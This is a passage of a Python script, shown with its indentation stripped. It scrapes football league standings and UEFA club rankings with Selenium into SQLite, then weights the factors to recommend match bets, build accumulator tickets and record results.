row.find_element_by_xpath('//*[@id="table-type-3"]/tbody/tr[' + str(counter) + ']/td[6]').get_attribute(
'textContent'))
goal_fa = str(
row.find_element_by_xpath('//*[@id="table-type-3"]/tbody/tr[' + str(counter) + ']/td[7]').get_attribute(
'textContent')).split(':')
away_goal_diff = int(goal_fa[0]) - int(goal_fa[1])
form_list = []
away_team_form = 0
try:
form_game1 = row.find_element_by_xpath(
'//*[@id="table-type-3"]/tbody/tr[' + str(counter) + ']/td[9]/div/a[2]').get_attribute('class')[13]
form_list.append(form_game1)
form_game2 = row.find_element_by_xpath(
'//*[@id="table-type-3"]/tbody/tr[' + str(counter) + ']/td[9]/div/a[3]').get_attribute('class')[13]
form_list.append(form_game2)
form_game3 = row.find_element_by_xpath(
'//*[@id="table-type-3"]/tbody/tr[' + str(counter) + ']/td[9]/div/a[4]').get_attribute('class')[13]
form_list.append(form_game3)
form_game4 = row.find_element_by_xpath(
'//*[@id="table-type-3"]/tbody/tr[' + str(counter) + ']/td[9]/div/a[5]').get_attribute('class')[13]
form_list.append(form_game4)
form_game5 = row.find_element_by_xpath(
'//*[@id="table-type-3"]/tbody/tr[' + str(counter) + ']/td[9]/div/a[6]').get_attribute('class')[26]
form_list.append(form_game5)
except:
form_game1 = row.find_element_by_xpath(
'//*[@id="table-type-3"]/tbody/tr[' + str(counter) + ']/td[9]/div/a[1]').get_attribute('class')[13]
form_list.append(form_game1)
form_game2 = row.find_element_by_xpath(
'//*[@id="table-type-3"]/tbody/tr[' + str(counter) + ']/td[9]/div/a[2]').get_attribute('class')[13]
form_list.append(form_game2)
form_game3 = row.find_element_by_xpath(
'//*[@id="table-type-3"]/tbody/tr[' + str(counter) + ']/td[9]/div/a[3]').get_attribute('class')[13]
form_list.append(form_game3)
form_game4 = row.find_element_by_xpath(
'//*[@id="table-type-3"]/tbody/tr[' + str(counter) + ']/td[9]/div/a[4]').get_attribute('class')[13]
form_list.append(form_game4)
form_game5 = row.find_element_by_xpath(
'//*[@id="table-type-3"]/tbody/tr[' + str(counter) + ']/td[9]/div/a[5]').get_attribute('class')[26]
form_list.append(form_game5)
for form in form_list:
if form == 'w':
form = 3
elif form == 'd':
form = 1
else:
form = 0
try:
away_team_form += form
except:
away_team_form = int(input('Team: ' + away_team_name + '| Please Input Team Form Here: '))
main_cur.execute('''INSERT INTO league_data_away (country_name, league_name, country_league_name, away_position, away_total_clubs,
away_team_name, away_team_id, away_matches_played, away_matches_won, away_matches_draw, away_matches_loss,
away_goal_diff, away_team_form)
VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?)
''', (country_name, league_name, country_league_name, away_position, away_total_clubs, away_team_name, away_team_id,
away_matches_played, away_matches_won, away_matches_draw, away_matches_loss,
away_goal_diff, away_team_form))
main_conn.commit()
counter += 1
leagues_scanned += 1
print("Updated away table", leagues_scanned, "of", total_leagues, "|", country_league_name, "table")
# ------------------------------------UEFA Rankings-----------------------------------------
def uefa_ranking_delete():
"""Delete the UEFA League Ranking Table"""
main_cur.execute("DELETE FROM uefa_team_ranking")
main_conn.commit()
def uefa_team_ranking():
"""Get the team ranking from the UEFA Coefficient website"""
print("Updating Team Ranking Table")
driver.get('https://www.uefa.com/memberassociations/uefarankings/club/seasonclub/') # Team ranking URL
ranking_table = driver.find_element_by_xpath(
'//*[@id="DataTables_Table_0"]/tbody')
ranking_row = ranking_table.find_elements_by_tag_name('tr')
position_counter = 1
# Get Statistics
for row in ranking_row:
team_rank = position_counter
team_name = str(row.find_element_by_xpath(
'//*[@id="DataTables_Table_0"]/tbody/tr['
+ str(position_counter) + ']/td[2]/span/a[1]').get_attribute('textContent')).strip()
uefa_points = float(row.find_element_by_xpath('//*[@id="DataTables_Table_0"]/tbody/tr['
+ str(position_counter) + ']/td[6]').get_attribute('textContent'))
position_counter += 1
# Plug values into database
main_cur.execute("INSERT INTO uefa_team_ranking (team_rank, team_name, uefa_points) VALUES (?, ?, ?)",
(team_rank, team_name, uefa_points))
main_conn.commit()
print("Updated Team Ranking Table")
# ---------------------------------League Win Calculations----------------------------------------
def league_winmargin(league_names):
"""Calculate the win margin for leagues in the database"""
for country_league_name in league_names:
main_cur.execute("SELECT percentage_chance FROM match_analysis WHERE country_league_name = ? "
"AND TEST_bet_result = 'Lost'", country_league_name)
perc_win_data = main_cur.fetchall()
if len(perc_win_data) < 10:
main_cur.execute("UPDATE leagues SET single_chnc_margin = 65, double_chnc_margin = 35 "
"WHERE country_league_name = ?", country_league_name)
main_conn.commit()
else:
double_chnc = int(round(numpy.percentile(perc_win_data, 75)))
single_chnc = int(round(numpy.percentile(perc_win_data, 90)))
main_cur.execute("UPDATE leagues SET single_chnc_margin = ?, double_chnc_margin = ? "
"WHERE country_league_name = ?", (single_chnc, double_chnc, country_league_name[0]))
main_conn.commit()
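# Worked illustration of the margins above (hypothetical data): with losing-bet confidence values
# perc_win_data = [40, 45, 50, 55, 60, 62, 65, 70, 75, 80], numpy.percentile(data, 75) = 68.75 and
# numpy.percentile(data, 90) = 75.5, so double_chnc becomes 69 and single_chnc becomes 76.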
def league_winrate(league_names):
"""Calculate the win rates of the leagues in the database for for all matches in a league"""
for country_league_name in league_names:
main_cur.execute("SELECT TEST_bet_result from match_analysis WHERE country_league_name = ? "
"AND TEST_bet_result IS NOT NULL", country_league_name)
data = main_cur.fetchall()
if len(data) == 0:
if country_league_name == 'England Premier League':
main_cur.execute("UPDATE leagues SET league_winperc = 61 "
"WHERE country_league_name = 'England Premier League'")
main_conn.commit()
elif country_league_name == 'England Championship':
main_cur.execute("UPDATE leagues SET league_winperc = 65 "
"WHERE country_league_name = 'England Championship'")
main_conn.commit()
elif country_league_name == 'England League One':
main_cur.execute("UPDATE leagues SET league_winperc = 57 "
"WHERE country_league_name = 'England League One'")
main_conn.commit()
elif country_league_name == 'England League Two':
main_cur.execute("UPDATE leagues SET league_winperc = 68 "
"WHERE country_league_name = 'England League Two'")
main_conn.commit()
elif country_league_name == 'France Ligue 1':
main_cur.execute("UPDATE leagues SET league_winperc = 67 "
"WHERE country_league_name = 'France Ligue 1'")
main_conn.commit()
elif country_league_name == 'Germany Bundesliga':
main_cur.execute("UPDATE leagues SET league_winperc = 66 "
"WHERE country_league_name = 'Germany Bundesliga'")
main_conn.commit()
elif country_league_name == 'Italy Serie A':
main_cur.execute("UPDATE leagues SET league_winperc = 72 "
"WHERE country_league_name = 'Italy Serie A'")
main_conn.commit()
elif country_league_name == 'Netherlands Eredivisie':
main_cur.execute("UPDATE leagues SET league_winperc = 56 "
"WHERE country_league_name = 'Netherlands Eredivisie'")
main_conn.commit()
elif country_league_name == 'Spain LaLiga':
main_cur.execute("UPDATE leagues SET league_winperc = 65 "
"WHERE country_league_name = 'Spain LaLiga'")
main_conn.commit()
elif country_league_name == 'Spain LaLiga2':
main_cur.execute("UPDATE leagues SET league_winperc = 67 "
"WHERE country_league_name = 'Spain LaLiga2'")
main_conn.commit()
else:
main_cur.execute("UPDATE leagues SET league_winperc = 0 "
"WHERE country_league_name = ?", country_league_name)
main_conn.commit()
else:
won = 0
lost = 0
total_played = 0
for bet_result in data:
if bet_result[0] == 'Won':
won += 1
total_played += 1
elif bet_result[0] == 'Lost':
lost += 1
total_played += 1
else:
continue
league_winrate = floor((won / total_played) * 100)
main_cur.execute("UPDATE leagues SET league_winperc = ? WHERE country_league_name = ?",
(league_winrate, country_league_name[0]))
main_conn.commit()
# ---------------------------------Factor Weight Ranking------------------------------------
def position_ranking_winrate(league_names):
"""Calculate the winrate based solely on position ranking for all matches in a league"""
for country_league_name in league_names:
main_cur.execute("SELECT home_position_rank, away_position_rank, percentage_chance, TEST_bet_result "
"FROM match_analysis WHERE TEST_bet_result IS NOT NULL AND country_league_name = ?",
country_league_name)
position_rank_data = main_cur.fetchall()
if len(position_rank_data) == 0:
main_cur.execute("UPDATE leagues SET pos_winrate = 71.52 WHERE country_league_name = ?",
country_league_name)
main_conn.commit()
else:
won = 0
lost = 0
for home_position_rank, away_position_rank, percentage_chance, test_bet_result in position_rank_data:
if home_position_rank > away_position_rank and test_bet_result == 'Won':
won += 1
elif home_position_rank < away_position_rank and test_bet_result == 'Won':
won += 1
elif home_position_rank > away_position_rank and test_bet_result == 'Lost':
lost += 1
elif home_position_rank < away_position_rank and test_bet_result == 'Lost':
lost += 1
else:
continue
try:
position_win_percentage = (won / (won + lost)) * 100
except ZeroDivisionError:
position_win_percentage = 71.52
main_cur.execute("UPDATE leagues SET pos_winrate = ? WHERE country_league_name = ?",
(position_win_percentage, country_league_name[0]))
main_conn.commit()
def team_name_ranking_winrate(league_names):
"""Calculate winrate of team name ranbking"""
for country_league_name in league_names:
main_cur.execute("SELECT home_team_name_rank, away_team_name_rank, percentage_chance, TEST_bet_result "
"FROM match_analysis WHERE TEST_bet_result is not null and home_team_name_rank is not null "
"OR away_team_name_rank is not null and country_league_name = ?",
country_league_name)
team_name_rank_data = main_cur.fetchall()
if len(team_name_rank_data) == 0:
main_cur.execute("UPDATE leagues SET team_name_winrate = 81.82 WHERE country_league_name = ?",
country_league_name)
main_conn.commit()
else:
won = 0
lost = 0
for home_team_name_rank, away_team_name_rank, percentage_chance, test_bet_result in team_name_rank_data:
if home_team_name_rank is None:
home_team_name_rank = 0
if away_team_name_rank is None:
away_team_name_rank = 0
if home_team_name_rank > away_team_name_rank and test_bet_result == 'Won':
won += 1
elif home_team_name_rank < away_team_name_rank and test_bet_result == 'Won':
won += 1
elif home_team_name_rank > away_team_name_rank and test_bet_result == 'Lost':
lost += 1
elif home_team_name_rank < away_team_name_rank and test_bet_result == 'Lost':
lost += 1
else:
continue
try:
team_name_win_percentage = (won / (won + lost)) * 100
except ZeroDivisionError:
team_name_win_percentage = 81.82
main_cur.execute("UPDATE leagues SET team_name_winrate = ? WHERE country_league_name = ?",
(team_name_win_percentage, country_league_name[0]))
main_conn.commit()
def form_ranking_winrate(league_names):
"""Calculate winrate of form ranking"""
for country_league_name in league_names:
main_cur.execute("SELECT home_form_rank, away_form_rank, percentage_chance, TEST_bet_result "
"FROM match_analysis WHERE TEST_bet_result IS NOT NULL AND country_league_name = ?",
country_league_name)
form_rank_data = main_cur.fetchall()
if len(form_rank_data) == 0:
main_cur.execute("UPDATE leagues SET form_winrate = 68.31 WHERE country_league_name = ?",
country_league_name)
main_conn.commit()
else:
won = 0
lost = 0
for home_form_rank, away_form_rank, percentage_chance, test_bet_result in form_rank_data:
if home_form_rank > away_form_rank and test_bet_result == 'Won':
won += 1
elif home_form_rank < away_form_rank and test_bet_result == 'Won':
won += 1
elif home_form_rank > away_form_rank and test_bet_result == 'Lost':
lost += 1
elif home_form_rank < away_form_rank and test_bet_result == 'Lost':
lost += 1
else:
continue
try:
team_form_win_percentage = (won / (won + lost)) * 100
except ZeroDivisionError:
team_form_win_percentage = 68.31
main_cur.execute("UPDATE leagues SET form_winrate = ? WHERE country_league_name = ?",
(team_form_win_percentage, country_league_name[0]))
main_conn.commit()
def gd_ranking_winrate(league_names):
"""Calculate winrate of goal difference ranking"""
for country_league_name in league_names:
main_cur.execute("SELECT home_gd_rank, away_gd_rank, percentage_chance, TEST_bet_result "
"FROM match_analysis WHERE TEST_bet_result IS NOT NULL AND country_league_name = ?",
country_league_name)
gd_rank_data = main_cur.fetchall()
if len(gd_rank_data) == 0:
main_cur.execute("UPDATE leagues SET gd_winrate = 72.81 WHERE country_league_name = ?",
country_league_name)
main_conn.commit()
else:
won = 0
lost = 0
for home_gd_rank, away_gd_rank, percentage_chance, test_bet_result in gd_rank_data:
if home_gd_rank is not None and test_bet_result == 'Won':
won += 1
elif away_gd_rank is not None and test_bet_result == 'Won':
won += 1
else:
lost += 1
try:
gd_win_percentage = (won / (won + lost)) * 100
except ZeroDivisionError:
gd_win_percentage = 72.81
main_cur.execute("UPDATE leagues SET gd_winrate = ? WHERE country_league_name = ?",
(gd_win_percentage, country_league_name[0]))
main_conn.commit()
def pos_weighting_calc(league_names):
""""calculate weightings for position ranking"""
for country_league_name in league_names:
main_cur.execute("SELECT pos_winrate, team_name_winrate, form_winrate, gd_winrate FROM leagues "
"WHERE country_league_name = ?", country_league_name)
ranking_data = main_cur.fetchall()
for position_ranking_winrate, team_name_ranking_winrate, form_ranking_winrate, gd_ranking_winrate in ranking_data:
total = position_ranking_winrate + team_name_ranking_winrate + form_ranking_winrate + gd_ranking_winrate
position_weighting = (position_ranking_winrate / total) * 100
main_cur.execute("UPDATE leagues SET pos_weighting = ? WHERE country_league_name = ?",
(position_weighting, country_league_name[0]))
main_conn.commit()
def team_name_weighting_calc(league_names):
""""calculate weightings for team reputation"""
for country_league_name in league_names:
main_cur.execute("SELECT pos_winrate, team_name_winrate, form_winrate, gd_winrate FROM leagues "
"WHERE country_league_name = ?", country_league_name)
ranking_data = main_cur.fetchall()
for position_ranking_winrate, team_name_ranking_winrate, form_ranking_winrate, gd_ranking_winrate in ranking_data:
total = position_ranking_winrate + team_name_ranking_winrate + form_ranking_winrate + gd_ranking_winrate
team_name_weighting = (team_name_ranking_winrate / total) * 100
main_cur.execute("UPDATE leagues SET team_name_weighting = ? WHERE country_league_name = ?",
(team_name_weighting, country_league_name[0]))
main_conn.commit()
def form_weighting_calc(league_names):
""""calculate weightings for team form"""
for country_league_name in league_names:
main_cur.execute("SELECT pos_winrate, team_name_winrate, form_winrate, gd_winrate FROM leagues "
"WHERE country_league_name = ?", country_league_name)
ranking_data = main_cur.fetchall()
for position_ranking_winrate, team_name_ranking_winrate, form_ranking_winrate, gd_ranking_winrate in ranking_data:
total = position_ranking_winrate + team_name_ranking_winrate + form_ranking_winrate + gd_ranking_winrate
form_weighting = (form_ranking_winrate / total) * 100
main_cur.execute("UPDATE leagues SET form_weighting = ? WHERE country_league_name = ?",
(form_weighting, country_league_name[0]))
main_conn.commit()
def gd_weighting_calc(league_names):
""""calculate weightings for goal differences"""
for country_league_name in league_names:
main_cur.execute("SELECT pos_winrate, team_name_winrate, form_winrate, gd_winrate FROM leagues "
"WHERE country_league_name = ?", country_league_name)
rank_data = main_cur.fetchall()
for position_ranking_winrate, team_name_ranking_winrate, form_ranking_winrate, gd_ranking_winrate in rank_data:
total = position_ranking_winrate + team_name_ranking_winrate + form_ranking_winrate + gd_ranking_winrate
gd_weighting = (gd_ranking_winrate / total) * 100
main_cur.execute("UPDATE leagues SET gd_weighting = ? WHERE country_league_name = ?",
(gd_weighting, country_league_name[0]))
main_conn.commit()
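# A minimal illustration of the weighting scheme implemented by the four *_weighting_calc
# helpers above: each factor's winrate is divided by the sum of all four winrates, so the
# resulting weightings add up to 100. The helper and numbers below are illustrative only —
# it is never called by this program and the values are not taken from the database.
def _example_weighting_split(winrates=None):
    """Return hypothetical factor weightings that sum to 100 (illustration only)."""
    winrates = winrates or {'pos': 70, 'team_name': 80, 'form': 65, 'gd': 72}
    total = sum(winrates.values())  # 287 for the example numbers
    # e.g. pos -> 70 / 287 * 100 ~= 24.4, team_name ~= 27.9, form ~= 22.6, gd ~= 25.1
    return {factor: (rate / total) * 100 for factor, rate in winrates.items()}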
# -------------------------------------Analysis---------------------------------------------
def analysis_delete_3month():
"""Delete matches that have results and are older than two months"""
main_cur.execute("DELETE FROM match_analysis where match_datetime < datetime('now', '-3 months')")
main_conn.commit()
def analysis_delete_upcoming():
"""Delete matches that have not been played yet"""
main_cur.execute("DELETE FROM match_analysis WHERE TEST_bet_result ISNULL")
main_conn.commit()
def analysis_insert():
"""Populate match analysis table"""
main_cur.execute("INSERT OR IGNORE INTO match_analysis (match_datetime, country_name, league_name, "
"country_league_name, home_team_name, home_team_id, away_team_name, away_team_ID, home_win, "
"home_draw, away_draw, away_win, home_position, away_position, total_clubs, home_matches_played, "
"away_matches_played, home_matches_won, away_matches_won, home_matches_draw, away_matches_draw, "
"home_matches_loss, away_matches_loss, home_goal_diff, away_goal_diff, home_team_form, "
"away_team_form, match_url) "
"SELECT match_datetime, match_data.country_name, match_data.league_name, "
"match_data.country_league_name, match_data.home_team_name, match_data.home_team_ID, "
"match_data.away_team_name, match_data.away_team_ID, home_win, home_draw, away_draw, away_win, "
"home_position, away_position, home_total_clubs, home_matches_played, away_matches_played, "
"home_matches_won, away_matches_won, home_matches_draw, away_matches_draw, home_matches_loss, "
"away_matches_loss, home_goal_diff, away_goal_diff, home_team_form, away_team_form, match_url "
"FROM match_data "
"INNER JOIN league_data_home ON match_data.home_team_name = league_data_home.home_team_name "
"INNER JOIN league_data_away ON match_data.away_team_name = league_data_away.away_team_name")
main_conn.commit()
def team_ranking_calc_home():
"""Calculate team ranking"""
main_cur.execute("SELECT flashscore_team_name, uefa_points "
"FROM name_conversion "
"INNER JOIN uefa_team_ranking on uefa_team_name = team_name")
result = main_cur.fetchall()
for index, rank in enumerate(result):
if index == 0:
top_point = rank[1]
main_cur.execute("SELECT match_analysis.fid, flashscore_team_name, uefa_points, team_name_weighting "
"FROM name_conversion "
"INNER JOIN uefa_team_ranking on uefa_team_name = team_name INNER JOIN match_analysis "
"ON flashscore_team_name = match_analysis.home_team_name "
"INNER JOIN leagues ON leagues.country_league_name = match_analysis.country_league_name "
"WHERE TEST_bet_result IS NULL ")
result = main_cur.fetchall()
# Calculate team rank
for fid, flashscore_team_name, uefa_points, team_name_weighting in result:
team_rank = (uefa_points / top_point) * team_name_weighting
main_cur.execute("UPDATE match_analysis SET home_team_name_rank = ? WHERE home_team_name = ? AND fid = ?",
(team_rank, flashscore_team_name, fid))
main_conn.commit()
def team_ranking_calc_away():
"""Calculate team ranking"""
main_cur.execute("SELECT flashscore_team_name, uefa_points "
"FROM name_conversion "
"INNER JOIN uefa_team_ranking on uefa_team_name = team_name")
result = main_cur.fetchall()
for index, rank in enumerate(result):
if index == 0:
top_point = rank[1]
main_cur.execute("SELECT match_analysis.fid, flashscore_team_name, uefa_points, team_name_weighting "
"FROM name_conversion "
"INNER JOIN uefa_team_ranking on uefa_team_name = team_name INNER JOIN match_analysis "
"ON flashscore_team_name = match_analysis.away_team_name "
"INNER JOIN leagues ON leagues.country_league_name = match_analysis.country_league_name "
"WHERE TEST_bet_result IS NULL ")
result = main_cur.fetchall()
# Calculate team rank
for fid, flashscore_team_name, uefa_points, team_name_weighting in result:
team_rank = (uefa_points / top_point) * (team_name_weighting)
main_cur.execute("UPDATE match_analysis SET away_team_name_rank = ? WHERE away_team_name = ? AND fid = ?",
(team_rank, flashscore_team_name, fid))
main_conn.commit()
def form_ranking_calc():
"""Calculate form ranking"""
main_cur.execute("SELECT match_analysis.fid, home_team_form, away_team_form, form_weighting FROM match_analysis "
"INNER JOIN leagues ON leagues.country_league_name = match_analysis.country_league_name "
"WHERE TEST_bet_result IS NULL ")
result = main_cur.fetchall()
for fid, home_team_form, away_team_form, form_weighting in result:
home_team_form_ranking = (home_team_form / 15) * form_weighting
away_team_form_ranking = (away_team_form / 15) * form_weighting
main_cur.execute("UPDATE match_analysis SET home_form_rank = ? WHERE fid = ?", (home_team_form_ranking, fid))
main_cur.execute("UPDATE match_analysis SET away_form_rank = ? WHERE fid = ?", (away_team_form_ranking, fid))
main_conn.commit()
def league_position_ranking_calc():
"""Calculate league position ranking"""
main_cur.execute("SELECT match_analysis.fid, home_matches_played, home_matches_won, home_matches_draw, "
"home_matches_loss, away_matches_played, away_matches_won, away_matches_draw, away_matches_loss, "
"pos_weighting FROM match_analysis "
"INNER JOIN leagues ON leagues.country_league_name = match_analysis.country_league_name "
"WHERE TEST_bet_result IS NULL ")
result = main_cur.fetchall()
for fid, hp, hw, hd, hl, ap, aw, ad, al, pw in result:
points_ranking_home = ((hw * 3) + (hd * 1)) / (hp * 3) * pw
points_ranking_away = ((aw * 3) + (ad * 1)) / (ap * 3) * pw
main_cur.execute("UPDATE match_analysis SET home_position_rank = ? WHERE fid = ?", (points_ranking_home, fid))
main_cur.execute("UPDATE match_analysis SET away_position_rank = ? WHERE fid = ?", (points_ranking_away, fid))
main_conn.commit()
def goal_difference_ranking_calc():
"""Calculate goal difference ranking"""
main_cur.execute("SELECT match_analysis.fid, home_goal_diff, away_goal_diff, gd_weighting FROM match_analysis "
"INNER JOIN leagues ON leagues.country_league_name = match_analysis.country_league_name "
"WHERE TEST_bet_result IS NULL ")
result = main_cur.fetchall()
for fid, home_gd, away_gd, gd_weighting in result:
max_n = gd_weighting
h2h_gd = home_gd - away_gd
tru_gd = abs(h2h_gd)
gd_rank = min(max_n, tru_gd)
if h2h_gd > 0:
main_cur.execute("UPDATE match_analysis SET home_gd_rank = ? WHERE fid = ?", (gd_rank, fid))
main_conn.commit()
elif h2h_gd < 0:
main_cur.execute("UPDATE match_analysis SET away_gd_rank = ? WHERE fid = ?", (gd_rank, fid))
main_conn.commit()
else:
continue
def generate_point_totals():
"""Generate the point totals using data in match analysis"""
main_cur.execute("SELECT match_analysis.fid, home_team_name_rank, home_position_rank, home_form_rank, home_gd_rank,"
" away_team_name_rank, away_position_rank, away_form_rank, away_gd_rank, home_win, home_draw, "
"away_draw, away_win, double_chnc_margin, single_chnc_margin "
"from match_analysis INNER JOIN leagues "
"ON match_analysis.country_league_name = leagues.country_league_name "
"WHERE TEST_bet_result IS NULL ")
results = main_cur.fetchall()
for fid, htnr, hpr, hfr, hgdr, atnr, apr, afr, agdr, hw, hd, ad, aw, dcm, scm in results:
if htnr is None:
htnr = 0
if hpr is None:
hpr = 0
if hfr is None:
hfr = 0
if hgdr is None:
hgdr = 0
if atnr is None:
atnr = 0
if apr is None:
apr = 0
if afr is None:
afr = 0
if agdr is None:
agdr = 0
home_total = float(htnr) + float(hpr) + float(hfr) + float(hgdr)
away_total = float(atnr) + float(apr) + float(afr) + float(agdr)
total_diff = home_total - away_total
if total_diff > 0:
percentage_chance = total_diff
if scm > percentage_chance > dcm:
rec_bet = '1x'
elif percentage_chance >= scm:
rec_bet = '1'
else:
rec_bet = 'Avoid'
else:
percentage_chance = abs(total_diff)
if scm > percentage_chance > dcm:
rec_bet = '2x'
elif percentage_chance >= scm:
rec_bet = '2'
else:
rec_bet = 'Avoid'
# Test Recommended bet
if total_diff >= 0:
percentage_chance = total_diff
if 60 > percentage_chance >= 0:
test_rec_bet = '1x'
else:
test_rec_bet = '1'
else:
percentage_chance = abs(total_diff)
if 60 > percentage_chance > 0:
test_rec_bet = '2x'
else:
test_rec_bet = '2'
main_cur.execute("UPDATE match_analysis SET home_points_total = ? WHERE fid = ?", (home_total, fid))
main_cur.execute("UPDATE match_analysis SET away_points_total = ? WHERE fid = ?", (away_total, fid))
main_cur.execute("UPDATE match_analysis SET rec_bet = ? WHERE fid = ?", (rec_bet, fid))
main_cur.execute("UPDATE match_analysis SET percentage_chance = ? WHERE fid = ?", (percentage_chance, fid))
main_cur.execute("UPDATE match_analysis SET TEST_rec_bet = ? WHERE fid = ?", (test_rec_bet, fid))
main_conn.commit()
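# Hedged sketch of the decision rule implemented in generate_point_totals() above: the
# absolute gap between the two point totals is compared against the league's single- and
# double-chance margins to pick a bet code. The helper below is illustrative only (it is
# never called here) and its default margins are placeholders, not the per-league values
# stored in the leagues table.
def _example_rec_bet(home_total, away_total, single_margin=60.0, double_margin=20.0):
    """Return '1', '1x', '2', '2x' or 'Avoid' for one hypothetical match."""
    diff = home_total - away_total
    chance = abs(diff)
    side = '1' if diff > 0 else '2'
    if chance >= single_margin:
        return side            # strong edge: back the side outright
    if chance > double_margin:
        return side + 'x'      # moderate edge: double chance (win or draw)
    return 'Avoid'             # too close to call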
# ------------------------------------Bet Tickets-------------------------------------------
def percentage_rec_calc():
"""Calculate Percentage recommendation for each match"""
main_cur.execute("SELECT match_analysis.fid, percentage_chance, league_winperc FROM match_analysis "
"INNER JOIN leagues ON match_analysis.country_league_name = leagues.country_league_name "
"WHERE bet_result isnull")
data = main_cur.fetchall()
for fid, percentage_chance, league_winperc in data:
percentage_rec = (percentage_chance + league_winperc) / 2
main_cur.execute("UPDATE match_analysis SET percentage_rec = ? WHERE fid = ?", (percentage_rec, fid))
main_conn.commit()
def view_all_recommended():
"""View all recommended bets"""
main_cur.execute("SELECT match_datetime, match_analysis.country_league_name, home_team_name, "
"away_team_name, rec_bet, percentage_rec "
"FROM match_analysis where bet_result isnull AND rec_bet <> 'Avoid' "
"AND match_datetime > datetime('now') ORDER BY percentage_rec DESC")
data = main_cur.fetchall()
for match_datetime, country_league_name, home_tn, away_tn, rec_bet, percentage_rec in data:
print(match_datetime + " | " + country_league_name + " | " + home_tn + " vs " + away_tn + " | " + rec_bet
+ " | " + str(round(percentage_rec, 2)))
def odds_list():
"""Returns the recommended odds for each match"""
# draw matches from database
main_cur.execute("SELECT fid, rec_bet, home_win, home_draw, away_draw, away_win "
"FROM match_analysis where bet_result isnull AND rec_bet <> 'Avoid' "
"AND match_datetime >= datetime('now', 'localtime') ORDER BY percentage_rec DESC")
data = main_cur.fetchall()
odds_data_list = []
# determine the odds for each recommended bet and collect (fid, odds) pairs
for fid, rec_bet, home_win, home_draw, away_draw, away_win in data:
bet_odds = 0.0
if rec_bet == '1':
bet_odds = float(home_win)
elif rec_bet == '1x':
bet_odds = float(home_draw)
elif rec_bet == '2x':
bet_odds = float(away_draw)
elif rec_bet == '2':
bet_odds = float(away_win)
if bet_odds > 1.14:
odds_data = (fid, bet_odds)
odds_data_list.append(odds_data)
else:
continue
return odds_data_list
def ticket_generation(acca_limit, odds_listing):
"""Create match tickets automatically"""
acca = 1 # Default multiplier
ticket_number = 1
print("--------------------------- Ticket", ticket_number, "----------------------------------")
for odds in odds_listing:
acca = acca * odds[1]
if acca <= acca_limit:
main_cur.execute(
"SELECT match_datetime, match_analysis.country_league_name, home_team_name, "
"away_team_name, rec_bet, percentage_rec FROM match_analysis where fid = ? ", (odds[0],))
data = main_cur.fetchall()
for match_datetime, country_league_name, home_tn, away_tn, rec_bet, percentage_rec in data:
print(match_datetime + " | " + country_league_name + " | " + home_tn + " vs " + away_tn + " | " +
rec_bet + " | " + str(odds[1]) + " | " + str(round(percentage_rec, 2)))
else:
print('Tickets Odds:', round((acca / odds[1]), 2))
acca = 1
ticket_number += 1
print(' ')
print("--------------------------- Ticket", ticket_number, "----------------------------------")
acca = acca * odds[1]
main_cur.execute(
"SELECT match_datetime, match_analysis.country_league_name, home_team_name, "
"away_team_name, rec_bet, percentage_rec "
"FROM match_analysis where fid = ? ", (odds[0],))
data = main_cur.fetchall()
for match_datetime, country_league_name, home_tn, away_tn, rec_bet, percentage_rec in data:
print(match_datetime + " | " + country_league_name + " | " + home_tn + " vs " + away_tn + " | " +
rec_bet + " | " + str(odds[1]) + " | " + str(round(percentage_rec, 2)))
print('Tickets Odds:', round(acca, 2))
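# Note on the accumulator above: a ticket's total odds ('acca') are simply the product of
# the selection odds, so with made-up odds of 1.30, 1.45 and 1.25 the ticket pays
# 1.30 * 1.45 * 1.25 ~= 2.36 and would still fit under an acca_limit of 2.5.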
# ------------------------------------Results-----------------------------------------------
def match_results():
"""Gather match results"""
print('Collecting match results...')
main_cur.execute('SELECT fid, match_url FROM match_analysis WHERE match_result ISNULL')
data = main_cur.fetchall()
match_count = 0
for fid, match_url in data:
driver.get(match_url)
match_status = driver.find_element_by_xpath('//*[@id="flashscore"]/div[1]/div[2]/div[2]'
).get_attribute('textContent')
if match_status == 'Finished':
home_score = driver.find_element_by_xpath('//*[@id="event_detail_current_result"]/span[1]'
).get_attribute('textContent')
away_score = driver.find_element_by_xpath('//*[@id="event_detail_current_result"]/span[2]/span[2]'
).get_attribute('textContent')
match_result = int(home_score) - int(away_score)
if match_result > 0:
main_cur.execute("UPDATE match_analysis SET match_result = 'Home Win' WHERE fid = ?", (fid,))
main_conn.commit()
match_count += 1
elif match_result < 0:
main_cur.execute("UPDATE match_analysis SET match_result = 'Away Win' WHERE fid = ?", (fid,))
main_conn.commit()
match_count += 1
elif match_result == 0:
main_cur.execute("UPDATE match_analysis SET match_result = 'Draw' WHERE fid = ?", (fid,))
main_conn.commit()
match_count += 1
else:
print("There was an error retrieving a match result", match_url)
continue
print("Number of match results retrieved:", match_count)
elif match_status == 'Postponed':
main_cur.execute('DELETE FROM match_analysis WHERE fid = ?', (fid,))
main_conn.commit()
def bet_result():
"""Calculate the bet result"""
main_cur.execute("SELECT fid, rec_bet, match_result FROM match_analysis WHERE bet_result ISNULL AND match_result IS"
" NOT NULL")
data = main_cur.fetchall()
for fid, rec_bet, match_result in data:
if match_result == 'Home Win' and (rec_bet == '1' or rec_bet == '1x'):
main_cur.execute("UPDATE match_analysis SET bet_result ='Won' WHERE fid = ?", (fid,))
main_conn.commit()
elif match_result == 'Away Win' and (rec_bet == '2' or rec_bet == '2x'):
main_cur.execute("UPDATE match_analysis SET bet_result ='Won' WHERE fid = ?", (fid,))
main_conn.commit()
elif match_result == 'Draw' and (rec_bet == '1x' or rec_bet == '2x'):
main_cur.execute("UPDATE match_analysis SET bet_result ='Won' WHERE fid = ?", (fid,))
main_conn.commit()
elif match_result == 'Home Win' and (rec_bet == '2' or rec_bet == '2x'):
main_cur.execute("UPDATE match_analysis SET bet_result ='Lost' WHERE fid = ?", (fid,))
main_conn.commit()
elif match_result == 'Away Win' and (rec_bet == '1' or rec_bet == '1x'):
main_cur.execute("UPDATE match_analysis SET bet_result ='Lost' WHERE fid = ?", (fid,))
main_conn.commit()
elif match_result == 'Draw' and (rec_bet == '1' or rec_bet == '2'):
main_cur.execute("UPDATE match_analysis SET bet_result ='Lost' WHERE fid = ?", (fid,))
main_conn.commit()
elif match_result == 'Home Win' and rec_bet == 'Avoid':
main_cur.execute("UPDATE match_analysis SET bet_result = 'Avoided' WHERE fid = ?", (fid,))
main_conn.commit()
elif match_result == 'Away Win' and rec_bet == 'Avoid':
main_cur.execute("UPDATE match_analysis SET bet_result = 'Avoided' WHERE fid = ?", (fid,))
main_conn.commit()
